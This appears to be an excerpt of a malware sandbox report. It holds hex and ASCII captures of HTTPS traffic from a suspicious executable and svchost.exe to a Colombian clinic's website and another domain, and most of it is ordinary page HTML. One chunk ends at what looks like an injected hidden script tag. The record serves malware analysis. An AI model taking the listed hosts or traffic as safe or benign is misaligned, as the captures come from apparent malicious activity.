                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1199INData Raw: 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 33 38 34 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 69 6e 64 69 63 61 64 6f 72 65 73 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 49 6e 64 69 63 61 64 6f 72 65 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d
                                                                                                                                                                                                                                                                        Data Ascii: menu-item-type-component g-menu-item-384 "><a class="g-menu-item-container" href="/index.php/nuestra-clinica/indicadores"><span class="g-menu-item-content"><span class="g-menu-item-title">Indicadores</span></span></a></li><li class="g-menu-item g-
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1200INData Raw: 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 32 33 31 20 20 22 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 64 69 72 65 63 74 6f 72 69 6f 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 44 69 72 65 63 74 6f 72 69 6f 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e
                                                                                                                                                                                                                                                                        Data Ascii: ss="g-menu-item g-menu-item-type-component g-menu-item-231 "><a class="g-menu-item-container" href="/index.php/contacto/directorio"><span class="g-menu-item-content"><span class="g-menu-item-title">Directorio</span></span></a></li><li class="g-men
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1202INData Raw: 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 61 69 6e 65 72 22 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 63 6f 6e 74 61 63 74 6f 2f 63 6f 70 61 73 73 74 2d 32 30 32 30 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 69 74 6c 65 22 3e 43 4f 50 41 53 53 54 3c 2f 73 70 61 6e 3e 0a 3c 2f 73 70 61 6e 3e 0a 3c 2f 61 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 3c 2f 6c 69 3e 0a 3c 6c 69 20 63 6c 61 73 73 3d 22 67 2d 6d 65 6e 75 2d 69 74 65 6d 20 67 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 63 6f 6d 70 6f 6e 65 6e 74
                                                                                                                                                                                                                                                                        Data Ascii: s="g-menu-item-container" href="/index.php/contacto/copasst-2020"><span class="g-menu-item-content"><span class="g-menu-item-title">COPASST</span></span></a></li></ul></div></div></li></ul></li><li class="g-menu-item g-menu-item-type-component
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1203INData Raw: 74 79 6c 65 3e 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 6c 6f 63 6b 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 2e 67 61 66 61 6e 63 79 62 6f 78 2d 69 6e 6e 65 72 20 7b 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 33 37 39 20 7b 0d 0a 09 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 32 29 3b 0d 0a 09 6f 70 61 63 69 74 79 3a 20 3b 0d 0a 7d 0d 0a 23 67 61 66 61 6e 63 79 62 6f 78 2d 73 6b 69 6e 33 37 39 7b 0d 0a 62 61 63 6b 67 72 6f 75 6e 64 3a 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 31 29 3b 2f 2a 70 6f 70 75 70 20 62 61 63 6b 67 72 6f
                                                                                                                                                                                                                                                                        Data Ascii: tyle>.gafancybox-lock {overflow: hidden !important;}.gafancybox-inner {overflow: hidden !important;}#gafancybox-overlay379 {background: rgba(0, 0, 0, 0.12);opacity: ;}#gafancybox-skin379{background: rgba(255, 255, 255, 1);/*popup backgro
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1204INData Raw: 6f 6e 65 27 2c 20 2f 2f 65 6c 61 73 74 69 63 2c 20 66 61 64 65 20 6f 72 20 6e 6f 6e 65 0d 0a 20 20 20 20 20 20 20 20 63 6c 6f 73 65 53 70 65 65 64 20 20 20 3a 20 32 35 30 2c 20 20 20 20 0d 0a 09 09 09 09 61 75 74 6f 48 65 69 67 68 74 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 61 75 74 6f 57 69 64 74 68 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 77 69 64 74 68 20 20 20 20 20 3a 20 37 38 30 2c 0d 0a 09 09 6d 61 78 48 65 69 67 68 74 20 3a 20 38 30 30 2c 09 0d 0a 09 09 63 6c 6f 73 65 43 6c 69 63 6b 20 20 3a 20 66 61 6c 73 65 2c 0d 0a 09 09 09 0d 0a 09 09 09 0d 0a 09 09 74 70 6c 3a 20 7b 0d 0a 09 09 09 09 6f 76 65 72 6c 61 79 20 20 3a 20 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 61 66 61 6e 63 79 62 6f 78 2d 6f 76 65 72 6c 61 79 22 20 69 64 3d 22 67 61 66 61 6e 63 79
                                                                                                                                                                                                                                                                        Data Ascii: one', //elastic, fade or none closeSpeed : 250, autoHeight : false,autoWidth : false,width : 780,maxHeight : 800,closeClick : false,tpl: {overlay : '<div class="gafancybox-overlay" id="gafancy
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1206INData Raw: 28 62 6f 78 69 64 29 2e 73 74 79 6c 65 2e 76 69 73 69 62 69 6c 69 74 79 3d 22 68 69 64 64 65 6e 22 3b 0d 0a 7d 0d 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 2d 61 68 6f 6c 69 63 33 37 39 22 20 68 72 65 66 3d 22 23 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 3c 2f 61 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 64 69 73 70 6c 61 79 3a 6e 6f 6e 65 3b 22 3e 0a 3c 64 69 76 20 69 64 3d 22 69 6e 6c 69 6e 65 2d 61 75 74 6f 33 37 39 22 3e 0a 3c 70 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 64 65 78 2e 70 68 70 2f 6e 75 65 73 74 72 61 2d 63 6c 69 6e 69 63 61 2f 6e 75 65 73 74 72 6f 73 2d 70 61 63 69 65 6e 74 65 73 2f 62 6c 6f 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 22 3e 3c 69
                                                                                                                                                                                                                                                                        Data Ascii: (boxid).style.visibility="hidden";}</script><a class="popup-aholic379" href="#inline-auto379"></a><div style="display:none;"><div id="inline-auto379"><p><a href="/index.php/nuestra-clinica/nuestros-pacientes/blog" target="_blank" rel="noopener"><i
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1207INData Raw: 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 65 64 20 67 2d 62 67 2d 34 20 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 61 6e 69 6d 61 74 69 6f 6e 2d 32 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 72 6f 63 6b 65 74 6c 61 75 6e 63 68 65 72 2f 68 6f 6d 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 32 2e 70 6e 67 22 20 61 6c 74 3d 22 69 6d 61 67 65 22 20 2f 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 74 69 74 6c 65 22 3e 0a 3c 73 70 61 6e 3e 43 69 74 61 73 20 4d c3 a9 64 69 63 61 73 3c 2f 73 70 61 6e 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 2d 62 75 74 74
                                                                                                                                                                                                                                                                        Data Ascii: "><div class="g-animatedblock-animated g-bg-4 g-animatedblock-animation-2"><img src="/images/rocketlauncher/home/slideshow/img-02.png" alt="image" /><div class="g-animatedblock-title"><span>Citas Mdicas</span></div><div class="g-animatedblock-butt
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1208INData Raw: 65 2f 73 6c 69 64 65 73 68 6f 77 2f 69 6d 67 2d 30 34 2e 70 6e 67 22 20 61 6c 74 3d 22 53 61 6c 69 65 6e 74 22 20 2f 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 20 6e 6f 70 61 64 64 69 6e 67 61 6c 6c 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 61 6e 69 6d 61 74 65 64 62 6c 6f 63 6b
                                                                                                                                                                                                                                                                        Data Ascii: e/slideshow/img-04.png" alt="Salient" /></div></div></div></div></div></div><div class="g-grid"><div class="g-block size-100 nopaddingall"><div class="g-content"><div class="moduletable "><div class="g-animatedblock "><div class="g-animatedblock
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1210INData Raw: 61 6c 69 73 74 61 73 2f 73 65 72 76 69 63 69 6f 2f 61 70 6f 79 6f 2d 64 69 61 67 6e 6f 73 74 69 63 6f 22 3e 41 70 6f 79 6f 20 44 69 61 67 6e c3 b3 73 74 69 63 6f 3c 2f 61 3e 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 66 69 67 75 72 65 3e 0a 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 32 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 6f 64 75 6c 65 74 61 62 6c 65 20 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 20 63 65 6e 74 65 72 20 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 68 6f 6d 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73
                                                                                                                                                                                                                                                                        Data Ascii: alistas/servicio/apoyo-diagnostico">Apoyo Diagnstico</a></div> </div></figure></div> </div></div></div><div class="g-block size-20"><div class="g-content"><div class="moduletable "><div class="g-promoimage center g-promoimage-home"><figure clas
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1211INData Raw: 65 22 3e 0a 3c 66 69 67 75 72 65 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 65 66 66 65 63 74 22 3e 0a 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 62 75 74 74 6f 6e 20 22 3e 3c 2f 73 70 61 6e 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 68 6f 6d 65 2f 63 61 6e 67 75 72 6f 2d 62 61 6a 61 2e 6a 70 67 22 20 61 6c 74 3d 22 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 63 61 70 74 69 6f 6e 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 69 63 6f 6e 22 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 70 72 6f 6d 6f 69 6d 61 67 65 2d 64 65 73 63 22 3e 3c 61 20 63 6c 61 73 73 3d 22 70 6f 72
                                                                                                                                                                                                                                                                        Data Ascii: e"><figure class="g-promoimage-effect"><span class="g-promoimage-iconbutton "></span><img src="/images/home/canguro-baja.jpg" alt=""><div class="g-promoimage-caption"><div class="g-promoimage-icon"></div><div class="g-promoimage-desc"><a class="por
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1212INData Raw: 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 31 30 30 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 70 61 63 65 72 22 3e 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 73 65 63 74 69 6f 6e 3e 0a 3c 73 65 63 74 69 6f 6e 20 69 64 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 2d 38 31 32 34 22 20 63 6c 61 73 73 3d 22 67 2d 77 72 61 70 70 65 72 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 67 72 69 64 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 73 69 7a 65 2d 35 30 22 3e 0a 3c 66 6f 6f 74 65 72 20 69 64 3d 22 67 2d 66 6f 6f 74 65 72 22 3e 0a 3c 64 69 76 20 63
                                                                                                                                                                                                                                                                        Data Ascii: g-grid"><div class="g-block size-100"><div class="spacer"></div></div></div></div></section><section id="g-container-8124" class="g-wrapper"><div class="g-container"> <div class="g-grid"><div class="g-block size-50"><footer id="g-footer"><div c
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1214INData Raw: 65 6e 63 69 c3 b3 6e 3a 20 4c 75 6e 20 2d 20 56 69 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 35 3a 30 30 20 70 2e 6d 2e 20 6a 6f 72 6e 61 64 61 20 43 6f 6e 74 69 6e 75 61 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73 74 72 6f 6e 67 3e 43 69 74 61 73 20 50 72 6f 67 72 61 6d 61 20 43 61 6e 67 75 72 6f 3a 20 3c 70 3e 36 30 37 36 34 33 30 30 32 36 20 45 78 74 2e 33 36 31 2d 33 36 34 20 2d 20 3c 62 72 3e 20 3c 73 74 72 6f 6e 67 3e 48 6f 72 61 72 69 6f 20 64 65 20 41 74 65 6e 63 69 c3 b3 6e 3a 20 44 65 20 4c 75 6e 65 73 20 61 20 56 69 65 72 6e 65 73 20 64 65 20 37 3a 30 30 20 61 2e 6d 2e 20 61 20 31 32 3a 30 30 20 6d 20 79 20 64 65 20 32 3a 30 30 20 70 2e 6d 2e 20 61 20 36 3a 30 30 20 70 2e 6d 2e 0a 3c 2f 62 72 3e 3c 62 72 3e 3c 2f 62 72 3e 0a 3c 73
                                                                                                                                                                                                                                                                        Data Ascii: encin: Lun - Vie 7:00 a.m. a 5:00 p.m. jornada Continua.</br><br></br><strong>Citas Programa Canguro: <p>6076430026 Ext.361-364 - <br> <strong>Horario de Atencin: De Lunes a Viernes de 7:00 a.m. a 12:00 m y de 2:00 p.m. a 6:00 p.m.</br><br></br><s
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1215INData Raw: 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 4e 75 65 76 6f 20 53 6f 74 6f 6d 61 79 6f 72 3c 2f 64 69 76 3e 20 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 69 74 65 6d 22 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 6c 61 62 65 6c 22 3e 50 42 58 3c 2f 64 69 76 3e 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 61 63 74 2d 74 65 78 74 22 3e 50 42 58 3a 20 2b 35 37 20 36 30 37 20
                                                                                                                                                                                                                                                                        Data Ascii: > </div><div class="g-contact-item"><div class="g-contact-label">Nuevo Sotomayor</div> <div class="g-contact-text">Nuevo Sotomayor</div> </div><div class="g-contact-item"><div class="g-contact-label">PBX</div> <div class="g-contact-text">PBX: +57 607
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1216INData Raw: 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67 2d 70 61 72 74 69 63 6c 65 22 3e 20 3c 61 20 68 72 65 66 3d 22 2f 22 20 74 69 74 6c 65 3d 22 22 20 72 65 6c 3d 22 68 6f 6d 65 22 20 63 6c 61 73 73 3d 22 67 2d 66 6f 6f 74 65 72 2d 6c 6f 67 6f 22 3e 0a 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 61 67 65 73 2f 32 30 32 31 2f 49 63 6f 6e 74 65 63 5f 4c 6f 67 6f 2e 6a 70 67 22 20 61 6c 74 3d 22 43 6c 69 6e 69 63 61 20 53 61 6e 20 4c 75 69 73 22 20 2f 3e 0a 3c 2f 61 3e 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 2d 62 6c 6f 63 6b 20 20 73 69 7a 65 2d 33 33 2d 33 22 3e 0a 3c 64 69 76 20 69 64 3d 22 74 6f 74 6f 70 2d 36 38 34 36 2d 70 61 72 74 69 63 6c 65 22 20 63 6c 61 73 73 3d 22 67 2d 63 6f 6e 74 65 6e 74 20 67
                                                                                                                                                                                                                                                                        Data Ascii: e" class="g-content g-particle"> <a href="/" title="" rel="home" class="g-footer-logo"><img src="/images/2021/Icontec_Logo.jpg" alt="Clinica San Luis" /></a></div></div><div class="g-block size-33-3"><div id="totop-6846-particle" class="g-content g
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1218INData Raw: 34 34 32 0d 0a 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 6d 65 64 69 61 2f 67 61 6e 74 72 79 35 2f 61 73 73 65 74 73 2f 6a 73 2f 6d 61 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 70 20 63 6c 61 73 73 3d 22 70 69 6e 22 3e 3c 73 70 61 6e 20 73 74 79 6c 65 3d 22 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 70 6f 73 69 74 69 6f 6e 3a 20 66 69 78 65 64 3b 20 62 6f 74 74 6f 6d 3a 20 30 70 78 3b 20 72 69 67 68 74 3a 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 39 39 39 39 39 39 39 39 39 39 39 39 3b 20 64 69 73 70 6c 61 79 3a 62 6c 6f 63 6b 3b 22 3e 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 4a 61 76
                                                                                                                                                                                                                                                                        Data Ascii: 442e="text/javascript" src="/media/gantry5/assets/js/main.js"></script><p class="pin"><span style="font-size: 10pt;"><div style="position: fixed; bottom: 0px; right:0px; z-index:999999999999; display:block;"><script language="JavaScript" type="text/Jav
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1219INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        74192.168.2.656982188.114.96.3443C:\Users\user\Desktop\iJzpyjAehB.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1183OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: hyab.se
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1183INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:19 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Location: https://hyab.com
                                                                                                                                                                                                                                                                        Cache-Control: max-age=600
                                                                                                                                                                                                                                                                        Expires: Fri, 10 Mar 2023 07:06:19 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Ji7UbdZ7dUGzsIjoKLUaMzH29uqoKc82Yqeh59KFaS3aNv4xsHrlOBlJR5d5XZ5v83XdxTy%2FvpgJn58IfUfy2HbXEK%2F3WX7JD%2BEZFA71qJK4w6Z0kfrAcYs"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a839ffa29be0-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1184INData Raw: 63 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 79 61 62 2e 63 6f 6d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: c8<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="https://hyab.com">here</a>.</p></body></html>
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1184INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                        75192.168.2.657001104.21.66.220443C:\Windows\SysWOW64\svchost.exe
                                                                                                                                                                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                        2023-03-10 06:56:19 UTC1184OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                        Accept: *
                                                                                                                                                                                                                                                                        Accept-Language: en-us
                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                        Host: clinicasanluis.com.co
                                                                                                                                                                                                                                                                        Cookie: d55e479f054c94814cbc10d217aaa990=bbd2a9ecd1f16e6deb08a6c096c7155a
                                                                                                                                                                                                                                                                        2023-03-10 06:56:20 UTC1269INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                        Date: Fri, 10 Mar 2023 06:56:20 GMT
                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                        Expires: Wed, 17 Aug 2005 00:00:00 GMT
                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                        Last-Modified: Fri, 10 Mar 2023 06:56:20 GMT
                                                                                                                                                                                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=MW%2B33WTj2zLU2KblcYUdu1kL4iGj8NrutNZE24yIUC5S%2B66DA1izuOYhmQsi2kevzmn4OoCP7m%2BhQ69pSMfMF96Ab9L43RW3RqxkCDlHrQW0TP8FnjLiNyf0XauSNoEvI3uk5WeFTK4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                        CF-RAY: 7a59a83b0aa49b3f-FRA
                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
